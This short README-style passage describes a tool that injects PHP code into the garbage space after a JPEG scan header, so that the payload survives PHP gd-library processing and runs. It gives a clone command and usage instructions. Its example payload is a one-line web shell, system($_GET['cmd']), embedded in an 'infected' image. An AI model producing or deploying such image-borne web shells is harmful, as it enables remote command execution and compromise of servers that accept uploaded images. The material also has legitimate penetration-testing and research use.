How it works
PHP code is injected in the null/garbage (brown) space after the scan header:
The newly infected jpeg is run through PHP’s gd-library. PHP interprets the payload injected in the jpeg and executes it.
git clone https://github.com/dlegs/php-jpeg-injector.git
python3 gd-jpeg.py [JPEG] [PAYLOAD] [OUTPUT_JPEG]
e.g. python3 gd-jpeg.py cat.jpeg ‘<?php system($_GET[“cmd”]);?>’ infected_cat.jpeg